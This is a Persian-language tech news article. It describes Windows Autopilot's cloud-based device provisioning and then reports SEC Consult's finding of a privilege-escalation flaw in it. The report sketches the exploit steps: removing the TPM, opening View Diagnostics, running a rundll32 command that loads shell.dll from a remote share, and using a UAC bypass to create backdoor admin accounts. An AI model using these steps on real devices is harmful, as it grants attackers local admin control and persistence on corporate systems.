about-3 back-contact back-deep eitaa کانال روبیکاخبرگزاری سایبربان
مطالب پربازدید
هوش
1403/08/29 - 07:56- هوش مصنوعي

هوش مصنوعی و دانش‌آموزان؛ تحولی که باید برای آن آماده شد

آموزش و پرورش، به خصوص مدارس به عنوان مهم‌ترین بستر تربیت نسل آینده، نقش کلیدی در آماده‌سازی دانش‌آموزان برای ورود به دنیای هوش مصنوعی دارد. اکنون هوش مصنوعی برای دانش‌آموزان یک انتخاب نیست، بلکه یک ضرورت است.

ساخت
1403/09/24 - 08:40- آسیا

ساخت پیچیده‌ترین سلاح سایبری زیرساختی جهان توسط ایران

کارشناسان ادعا کردند که بدافزار مرتبط با ایران زیرساخت‌های حیاتی ایالات متحده و رژیم صهیونیستی را هدف قرار داده است.

راه‌اندازی
1403/09/28 - 07:37- آسیا

راه‌اندازی اولین کامپیوتر کوانتومی ساخت رژیم صهیونیستی

رژیم صهیونیستی از راه‌اندازی اولین کامپیوتر کوانتومی ساخت خود با استفاده از فناوری پیشرفته ابررسانا خبر داد.

انتشار شده در تاریخ

ویندوز اتوپایلوت

Windows Autopilot تحولی جدید برای نصب، تنظیم مجدد و نصب مجدد رایانه‌ها بر پایه فضای ابری است.

به گزارش کارگروه فناوری اطلاعات سایبربان ؛ Windows Autopilot تحولی جدید برای نصب، تنظیم مجدد و نصب مجدد رایانه‌ها بر پایه فضای ابری است. کاربران می‌توانند بدون کمک متخصصان فناوری اطلاعات، اعمال مذکور را انجام دهند. این سامانه امکان نصب بر روی شبکه و کنترل و مدیریت آن را نیز دارد.
حالت نصب خودکار این سامانه، امکان نصب سیستم عامل شخصی‌سازی شده را بدون دخالت کاربر می‌دهد. این بدان معناست که یک ویندوز کاملا طراحی شده با تنظیمات شخصی امکان نصب روی تعداد زیادی سیستم را نیز خواهد داشت. برای دستگاه‌هایی با اتصال شبکه داخلی نیازی به مداخله کاربر نیست و این کار توسط مدیر شبکه اتفاق می‌افتد و همه کاربران می توانند از تنظیماتی یکسان، بهره‌مند شوند.
این ویژگی از طریقWi-Fi نیز قابل اجرا است. برای این کار، کافیست اتصال به شبکه انجام ‌شود.
حالت نصب خودکار، از طریق اتصال به فضای ابری، روند زیر را طی می‌کند:


دستگاه به Azure Active Directory متصل شده و همه خط مشی‌ها، برنامه‌ها، گواهینامه‌ها و نمایه‌های شبکه، در دستگاه جدید مورد نظر ارائه می‌شوند. امکان استفاده از دستگاه تا زمان کامل شدن فرایند وجود نخواهد داشت. حالت خودآرایی به کاربر امکان استفاده از ویندوز 10 شخصی خود را بر روی یک کیوسک، دستگاه امضای دیجیتال یا یک دستگاه مشترک می‌دهد.

 


الزامات


حالت خودآرایی، از سخت‌افزار TPM 2.0 و برای تأیید اعتبار دستگاه از Azure AD  Microsoft استفاده می‌کند. بنابراین، دستگاه‌ها ضمن دارا بودن TPM 2.0 باید از آن پشتیبانی کنند. روند تأیید TPM همچنین نیاز به دسترسی به مجموعه‌ای ازآدرس‌های URL HTTPS دارد که برای هر فروشنده TPM به صورت اختصاصی ارائه می‌شود. 


مزایای سامانه نصب اتوماتیک ویندوز

  •   اتصال سریع به فضای ابری
  •     آماده‌سازی خیلی سریع دستگاه شخصی
  •    کنترل کامل روند نصب
  •   آماده سازی سریع دستگاه‌های جدید

 

پشتیبانی از دستگاه‌های موجود


این سامانه با پشتیبانی از همه دستگاه‌های موجود، امکان استفاده سریع از پروفایل شخصی و برنامه‌های نصب شده بر روی سیستم شخصی را بر روی هر دستگاهی می‌دهد.


آماده سازی اشتراکی


برای پیکربندی و راه اندازی کامل دستگاه می‌توان از شرکا یا متخصصان IT کمک گرفت.


بازنشانی اطلاعات


در این ویژگی می‌توان پرونده‌ها، برنامه‌ها و تنظیمات شخصی را حذف و دستگاه را به تنظیمات اصلی خود برگرداند چرا که همه آنها در Azure AD ذخیره شده و این حذف تأثیری بر آنها نمی‌گذارد. این ویژگی انتقال دستگاه به کاربر دیگر را تسهیل می‌کند.


سیستم ایمنی


این بخش اطمینان حاصل می‌کند که کاربران فقط با دستگاه‌های کاملاً پیکربندی شده‌ای که تمام شرایط ایمنی آن برآورده شده، کار می‌کنند.


آسیب پذیری در Microsoft Autopilot امکان کنترل سیستم را به شما می‌دهد


محققان امنیتی شرکت اتریشی SEC Consult از یک آسیب‌پذیری خطرناک در ابزار استقرار دستگاه‌ها در شبکه‌های شرکتی Microsoft Autopilot  پرده برداشته و تاکید کردند که بهره برداری از آن امکان کنترل سیستم رایانه‌ای هدف را می‌دهد.
این مسئله بر روند نصب این سامانه خودکار تأثیر گذاشته و به هکر یا کاربر اجازه می‌دهد سطح دسترسی خود را به سطح مدیر محلی برساند. این نفوذ حتی اگر قوانین و تنظیمات پروفایل(نمایه) سامانه خودکار، مشخص و محدود شده باشد نیز امکان‌پذیر است.
اولین قدم برای استفاده از این آسیب‌پذیری، فعال‌کردن دستگاه است. دستگاه در ابتدا خطا می‌دهد. خطای سیستم با حذف فیزیکی دستگاه امنیتیTPM ، یعنی قطع ارتباط آن از ماشین مجازی، به صورت دستی برطرف می‌شود. در این حالت، نصب به صورت ناموفق و ناقص انجام خواهد شد.
حال نفوذ به گونه‌ای است که هنگامی که پنجره‌ای با یک پیام خطا باز می‌شود، باید بر روی دکمه ViewDiagnostics کلیک کرده و سپس از پوشه  Rundll32.exe \\ 10.0.0.1 \ shell.dll، DLLMain را انتخاب کنید. با فعال شدن این گزینه، مهاجم به عنوان کاربر پیش فرضdefaultuser0  متصل می‌شود. اکنون این کاربر از حقوق مدیر برخوردار است.
برای دور زدن سیستمUAC   نیز، متخصصان از StoreFileSys استفاده کردند و توانایی ایجاد یک کاربر محلی با حقوق مدیر یا پیاده‌سازی سایر درب‌پشتی‌ها را داشتند. در این مسیر نیز دستگاه دوباره به شبکه محلی متصل شده، نصب نرم‌افزار از سر گرفته می‌شود و تا پایان با موفقیت ادامه می یابد. حال  user defaultuser0حذف می‌شود، اما کاربران محلی که قبلا ایجاد شده بودند حذف نمی‌شوند.
علی‌رغم انکار این آسیب‌پذیری توسط مایکروسافت، متخصصان کد (سند اثبات جرم) PoC را برای این آسیب‌پذیری به مایکروسافت ارائه دادند.
 

منبع:

تازه ترین ها
تشکیل
1403/10/23 - 15:15- آسیا

تشکیل سازمان امنیت سایبری در ترکیه

ترکیه با هدف ارتقای امنیت سایبری ملی سازمان ریاست امنیت سایبری را تأسیس کرد.

دبی
1403/10/23 - 13:08- هوش مصنوعي

دبی میزبان رقابت برترین توسعه دهندگان بازی هوش مصنوعی

دبی میزبان رویدادی برای رقابت برترین توسعه دهندگان بازی هوش مصنوعی در 23 ژانویه امسال خواهد بود.

تولید
1403/10/23 - 12:55- آمریکا

تولید تراشه‌های ۴ نانومتری در آمریکا

شرکت صنایع نیمه‌رسانا تایوان، تولید تراشه‌های ۴ نانومتری را در آریزونا آمریکا آغاز می‌کند.

مطالب مرتبط

در این بخش مطالبی که از نظر دسته بندی و تگ بندی مرتبط با محتوای جاری می باشند نمایش داده می‌شوند.